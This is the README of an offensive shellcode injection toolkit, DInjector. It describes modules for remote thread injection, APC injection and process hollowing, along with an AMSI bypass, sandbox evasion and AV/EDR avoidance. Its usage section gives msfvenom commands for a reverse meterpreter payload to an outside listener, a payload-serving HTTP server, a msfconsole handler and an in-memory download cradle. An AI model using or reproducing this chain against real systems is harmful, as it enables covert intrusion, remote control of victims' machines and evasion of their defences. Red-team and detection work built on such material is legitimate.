DInjector: Collection of shellcode injection techniques
DInjector
This repository is an accumulation of my code snippets for various shellcode injection techniques using fantastic D/Invoke API by @TheWover and @FuzzySecurity.
Features:
- Fully ported to D/Invoke API.
- Encrypted payloads which can be invoked from a URL or passed in base64 as an argument.
- Built-in AMSI bypass based on the @rasta-mouse method.
- Sandbox detection & evasion.
ℹ️ Based on my testings the DInvoke NuGet package itself is being flagged by many commercial AV/EDR solutions when included as an embedded resource via Costura.Fody (or similar approaches), so I’ve shrinked it a bit and included from source to achieve better OpSec.
Modules
- FunctionPointer Allocates an RWX memory region, copies the shellcode into it, and executes it like a function.
- FunctionPointerV2 Sets RWX on a byte array and executes it like a function.
- CurrentThread Injects shellcode into the current process. Thread execution via NtCreateThreadEx.
- RemoteThread Injects shellcode into an existing remote process. Thread execution via NtCreateThreadEx.
- RemoteThreadSuspended Injects shellcode into an existing remote process and flips memory protection to PAGE_NOACCESS. After a short sleep (waiting until a possible AV scan is finished) the protection is flipped again to PAGE_EXECUTE_READ. Thread execution via NtCreateThreadEx.
- RemoteThreadAPC Injects shellcode into a newly spawned remote process. Thread execution via NtQueueApcThread.
- RemoteThreadContext Injects shellcode into a newly spawned remote process. Thread execution via SetThreadContext.
- ProcessHollow Injects shellcode into a newly spawned remote process. Thread execution via NtResumeThread (hollowing with shellcode).
Download
git clone https://github.com/snovvcrash/DInjector.git
Use
- Compile the project in VS.
- Generate a shellcode for your favourite C2:
~$ msfvenom -p windows/x64/meterpreter/reverse_winhttps LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f raw -o shellcode.bin
- Encrypt the shellcode:
~$ encrypt.py shellcode.bin -p 'Passw0rd!' -o enc
- Serve the encrypted shellcode and prepare C2 listener:
~$ sudo python3 -m http.server 80
~$ sudo msfconsole -qx “use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_winhttps; set lhost 10.10.13.37; set lport 443; set EXITFUNC thread; run”
- Use the PowerShell download cradle to load DInjector.dll as System.Reflection.Assembly and execute it from memory.
Required global arguments:
Name | Example Value | Description |
---|---|---|
/am51 | true, false | Applies AMSI bypass |
/sc | http://10.10.13.37/enc | Sets shellcode path (can be loaded from URL or as a Base64 string) |
/password | Passw0rd! | Sets password to decrypt the shellcode |
Copyright (c) 2021, snovvcrash
All rights reserved.
Source: https://github.com/snovvcrash/